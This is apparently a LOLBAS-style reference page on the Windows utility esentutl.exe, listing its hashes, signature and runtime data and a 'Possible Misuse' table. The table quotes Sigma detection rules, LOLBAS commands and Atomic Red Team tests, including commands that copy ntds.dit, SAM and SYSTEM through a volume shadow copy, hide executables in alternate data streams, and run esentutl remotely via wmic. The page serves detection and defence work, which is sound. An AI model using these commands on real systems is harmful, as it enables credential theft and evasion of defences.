esentutl.exe

File Path: C:\WINDOWS\SysWOW64\esentutl.exe
Description: Extensible Storage Engine Utilities for Microsoft(R) Windows(R)

Hashes

Type	Hash
MD5	`D5BFB83F73604AC0D571E972D25604D7`
SHA1	`2DB485A1219BFE5A806F9F497B661097BA99ED07`
SHA256	`954AAA329E4225E0A83F36F96DAA5B7B418BD6207F8DF7231BA8CE75E5996CD9`
SHA384	`5C6E9C441B2F5C8C575EAA957F7BCF3A12E9BB4BC4127AEAFC6E276DD823E8B7545ED159A39C77002367BD72986EF9DC`
SHA512	`8B54AB3518EA3EFF0D4DAAA649BC4C10A5D0A88009778AAEE39C0379E0AD2C5625AB9316D5C2DCEC8EC1220208AA82ECA35EEF0C7ECB6E4C9FC6D099C92FBF14`
SSDEEP	`6144:UW2/ZZS+9itpvOghWPh612MAwqCgMqyY02SaXB+U5jMjArCk16imWqui2Amikbu8:SZZV9itpv9hWPZOJRTXS/EuMC`
IMP	`08A29170254C7CA52C81DD3D57316BA4`
PESHA1	`388B171C526AB29BBF2A48943392570A65504172`
PE256	`73C5E054276DB2FEC4A9B68B2DF3AF98B01CAF4F98EC08B554E56B770303A91E`

Runtime Data

Child Processes:

conhost.exe

Open Handles:

Path	Type
(RW-) C:\Windows	File
(RW-) C:\Windows\SysWOW64	File
\BaseNamedObjects\C:ProgramDataMicrosoftWindowsCaches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db	Section
\BaseNamedObjects\C:ProgramDataMicrosoftWindowsCaches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db	Section
\BaseNamedObjects\C:ProgramDataMicrosoftWindowsCaches*cversions.2.ro	Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0	Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0	Section

Loaded Modules:

Path
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\wow64.dll
C:\WINDOWS\System32\wow64base.dll
C:\WINDOWS\System32\wow64con.dll
C:\WINDOWS\System32\wow64cpu.dll
C:\WINDOWS\System32\wow64win.dll
C:\WINDOWS\SysWOW64\esentutl.exe

Signature

Status: Signature verified.
Serial: 33000002ED2C45E4C145CF48440000000002ED
Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

Original Filename: esentutl.exe
Product Name: Microsoft Windows Operating System
Company Name: Microsoft Corporation
File Version: 10.0.22000.1 (WinBuild.160101.0800)
Product Version: 10.0.22000.1
Language: English (United States)
Machine Type: 32-bit

File Scan

VirusTotal Detections: 0/72
VirusTotal Link: https://www.virustotal.com/gui/file/954aaa329e4225e0a83f36f96daa5b7b418bd6207f8df7231ba8ce75e5996cd9/detection

Possible Misuse

The following table contains possible examples of esentutl.exe being misused. While esentutl.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source	Source File	Example	License
sigma	sysmon_suspicious_remote_thread.yml	`- '\esentutl.exe'`	DRL 1.0
sigma	win_susp_esentutl_activity.yml	`title: Suspicious Esentutl Use`	DRL 1.0
sigma	win_susp_esentutl_activity.yml	`description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.`	DRL 1.0
sigma	win_susp_vssadmin_ntds_activity.yml	`- https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/`	DRL 1.0
sigma	win_susp_vssadmin_ntds_activity.yml	`- esentutl.exe /y /vss \ntds.dit`	DRL 1.0
sigma	win_susp_vssadmin_ntds_activity.yml	`- esentutl.exe /y /vss *\SAM`	DRL 1.0
sigma	win_susp_vssadmin_ntds_activity.yml	`- esentutl.exe /y /vss *\SYSTEM`	DRL 1.0
sigma	proc_creation_win_alternate_data_streams.yml	`- 'esentutl '`	DRL 1.0
sigma	proc_creation_win_copying_sensitive_files_with_credential_data.yml	`- https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/`	DRL 1.0
sigma	proc_creation_win_copying_sensitive_files_with_credential_data.yml	`- Image\\|endswith: '\esentutl.exe'`	DRL 1.0
sigma	proc_creation_win_esentutl_webcache.yml	`title: Esentutl Steals Browser Information`	DRL 1.0
sigma	proc_creation_win_esentutl_webcache.yml	`description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe`	DRL 1.0
sigma	proc_creation_win_esentutl_webcache.yml	`Image\\|endswith: \esentutl.exe`	DRL 1.0
sigma	proc_creation_win_susp_esentutl_params.yml	`title: Esentutl Gather Credentials`	DRL 1.0
sigma	proc_creation_win_susp_esentutl_params.yml	`description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.`	DRL 1.0
sigma	proc_creation_win_susp_esentutl_params.yml	`- 'esentutl'`	DRL 1.0
sigma	registry_event_esentutl_volume_shadow_copy_service_keys.yml	`title: Esentutl Volume Shadow Copy Service Keys`	DRL 1.0
sigma	registry_event_esentutl_volume_shadow_copy_service_keys.yml	`description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.`	DRL 1.0
sigma	registry_event_esentutl_volume_shadow_copy_service_keys.yml	`Image\\|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter`	DRL 1.0
LOLBAS	Esentutl.yml	`Name: Esentutl.exe`
LOLBAS	Esentutl.yml	`- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o`
LOLBAS	Esentutl.yml	`- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o`
LOLBAS	Esentutl.yml	`- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o`
LOLBAS	Esentutl.yml	`- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o`
LOLBAS	Esentutl.yml	`- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o`
LOLBAS	Esentutl.yml	`- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit`
LOLBAS	Esentutl.yml	`- Path: C:\Windows\System32\esentutl.exe`
LOLBAS	Esentutl.yml	`- Path: C:\Windows\SysWOW64\esentutl.exe`
LOLBAS	Esentutl.yml	`- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/`
atomic-red-team	index.md	- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #3: esentutl.exe SAM copy [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #3: esentutl.exe SAM copy [windows]	MIT License. © 2018 Red Canary
atomic-red-team	T1003.002.md	- Atomic Test #3 - esentutl.exe SAM copy	MIT License. © 2018 Red Canary
atomic-red-team	T1003.002.md	## Atomic Test #3 - esentutl.exe SAM copy	MIT License. © 2018 Red Canary
atomic-red-team	T1003.002.md	Copy the SAM hive using the esentutl.exe utility	MIT License. © 2018 Red Canary
atomic-red-team	T1003.002.md	esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}	MIT License. © 2018 Red Canary
atomic-red-team	T1003.003.md	- Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl	MIT License. © 2018 Red Canary
atomic-red-team	T1003.003.md	## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl	MIT License. © 2018 Red Canary
atomic-red-team	T1003.003.md	The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.	MIT License. © 2018 Red Canary
atomic-red-team	T1003.003.md	wmic /node:”#{target_host}” process call create “cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}”	MIT License. © 2018 Red Canary
atomic-red-team	T1564.004.md	esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o	MIT License. © 2018 Red Canary